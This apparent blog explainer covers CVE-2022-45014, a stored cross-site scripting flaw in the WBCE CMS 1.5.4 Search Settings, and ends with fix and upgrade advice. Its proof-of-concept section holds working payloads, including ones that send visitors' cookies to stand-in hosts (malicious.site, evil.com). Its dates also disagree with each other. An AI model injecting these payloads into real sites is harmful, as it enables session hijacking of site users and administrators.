On November 24, 2022, a serious cross-site scripting (XSS) vulnerability was found in WBCE CMS version 1.5.4, affecting its Search Settings module. Tracked as CVE-2022-45014, this bug allows attackers to run malicious JavaScript or inject HTML via the "Results Header" field. Even though XSS bugs like this are common, this one poses a real risk because it affects a default module of a popular content management system (CMS).
This post explains how the vulnerability works, shows you actual code snippets that exploit it, and gives advice on staying safe. Whether you're a developer, a site owner, or just curious, you'll find everything you need here, written in plain American English.
What is WBCE CMS?
WBCE CMS is an open-source content management system, popular for small business and personal websites. Like WordPress, it features modules for common functions—one of which is the "Search" module. The Search module has a hidden danger in how it handles the "Results Header" field.
Official Advisory
CVE-2022-45014 describes an XSS vulnerability in the Search Settings of WBCE CMS 1.5.4.
Field: Results Header
- Impact: Attacker can inject JavaScript which runs in admin browsers or users visiting search results
References
- MITRE CVE Entry
- Exploit-DB #51035
How Does the Attack Work?
The Search module lets an administrator customize the text above the search results via the "Results Header" field. Unfortunately, the input isn’t properly sanitized or filtered. This means anything typed in that box will be displayed as raw HTML/JavaScript to end-users.
If an attacker can change this field (by phishing or exploiting another vulnerability to gain admin access), they can make every search page run malicious code.
1. Gaining Access
- Prerequisite: Access to edit Search Settings (usually requires admin or someone with Search module permissions)
- Type or paste this payload
<script>alert('XSS by CVE-2022-45014');</script>
Or, for a stealthier attack
<img src="x" onerror="fetch('https://malicious.site/cookie?c='+document.cookie)">
Save settings.
- Anyone who does a search on the website will see the Results Header rendered—including the injected <script>. Their browser will execute the code.
Demo exploit
<script>alert('Hacked! XSS CVE-2022-45014')</script>
PoC (Proof of Concept) Step-by-Step
Step 1: Authenticate as an administrator (or any user who can edit Search Settings).
Step 2: Visit the Search module settings
http://yoursite.com/admin/modules/search/settings.php
Step 3: Find the "Results Header" field and paste the following code
<script>window.location='https://evil.com/?cookie='+document.cookie</script>;
Step 4: Click "Save".
Step 5: Now, on the public site, perform any search.
How to Fix
Status: The bug is fixed in later versions (1.5.5 and above). Upgrade WBCE CMS now!
If you can't update
- Edit modules/search/settings.php, sanitize $results_header using htmlspecialchars() or the CMS's escaping functions.
Additional Resources
- WBCE Forum Announcement
- Exploit Database Entry
- OWASP XSS Cheat Sheet
Conclusion
CVE-2022-45014 is a textbook example of how seemingly simple input fields can become serious security liabilities. If you run WBCE CMS, check your version and update as soon as possible. Always sanitize output—never trust user input, even in admin-only settings.
Stay safe, patch quickly, and keep an eye out for more vulnerabilities like this.
*Written exclusively for you. If you have questions about similar XSS bugs, or need help securing your CMS, reach out any time.*
Timeline
Published on: 11/21/2022 15:15:00 UTC
Last modified on: 11/21/2022 20:27:00 UTC